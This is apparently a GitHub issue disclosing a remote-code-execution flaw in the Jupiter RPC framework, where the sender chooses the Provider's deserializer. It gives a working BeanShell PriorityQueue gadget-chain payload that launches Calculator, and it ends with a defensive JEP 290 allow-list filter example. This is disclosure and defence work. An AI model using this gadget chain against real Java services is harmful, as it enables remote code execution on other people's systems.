fengjiachun / Jupiter

Jupiter is a high-performance, lightweight distributed service framework.


Another approach capable of achieving RCE attacks

adv851 opened this issue · comments


Problem Description

As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.

Reproduce

Provider

We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
[Screenshot 2023-11-02 22:54:28]

POC
[Screenshot 2023-11-02 22:46:53]

At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects, one is selected here as an example, and this chain depends on the following JAR files).

```xml
<dependency>
    <groupId>org.beanshell</groupId>
    <artifactId>bsh</artifactId>
    <version>2.0b5</version>
</dependency>
```

```java
public static Object getBshObject() throws Exception {
    // BeanShell payload

    String payload =
            "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                    Strings.join( // does not support spaces in quotes
                            Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                            ",", "\"", "\"") +
                    "}).start();return new Integer(1);}";

    // Create Interpreter
    Interpreter i = new Interpreter();

    // Evaluate payload
    i.eval(payload);

    // Create InvocationHandler
    XThis xt = new XThis(i.getNameSpace(), i);
    InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

    // Create Comparator Proxy
    Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

    // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
    final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
    Object[] queue = new Object[] {1,1};
    Reflections.setFieldValue(priorityQueue, "queue", queue);
    Reflections.setFieldValue(priorityQueue, "size", 2);

    return priorityQueue;
}
```

Attack Impact

This is capable of executing an RCE attack; in this attack test, it is demonstrated by launching the calculator application.
[Screenshots 2023-11-02 22:51:49, 22:52:28, 22:52:50]
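The Provider-side check a defender would want against the report above, as an added example that is neither Jupiter's code nor the reporter's: a JEP 290 deserialization filter (java.io.ObjectInputFilter, JDK 9+; on 8u121+ the same API lives in sun.misc) that allow-lists only the application's own payload classes, so a native JDK stream carrying a PriorityQueue or Proxy-based gadget is rejected at the class descriptor before any readObject() runs. The Greeting DTO and class names are assumptions standing in for real Jupiter payload types.

```java
import java.io.*;
import java.util.PriorityQueue;

public class FilteredDeserialization {

    // Hypothetical application DTO (an assumption) standing in for a real Jupiter payload class.
    public static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Greeting(String text) { this.text = text; }
    }

    // JEP 290 allow-list: only the DTO and String may be deserialized, at most 8 levels deep;
    // the trailing "!*" rejects every other class before its readObject() is ever invoked.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            "FilteredDeserialization$Greeting;java.lang.String;maxdepth=8;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // The Provider-side read path: the filter is installed before readObject() is called.
    static Object deserialize(byte[] bytes) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Greeting ok = (Greeting) deserialize(serialize(new Greeting("hello")));
        System.out.println("accepted: " + ok.text);

        // An empty PriorityQueue is harmless, but its class is not on the allow-list, so the
        // stream is rejected at the class descriptor, before PriorityQueue.readObject() runs.
        try {
            deserialize(serialize(new PriorityQueue<String>()));
            System.out.println("BUG: gadget-capable class was accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter only helps on the native JDK path; the underlying problem in the report, letting the sender pick the Provider's deserializer, is fixed by having the Provider refuse serializer codes it has not explicitly enabled.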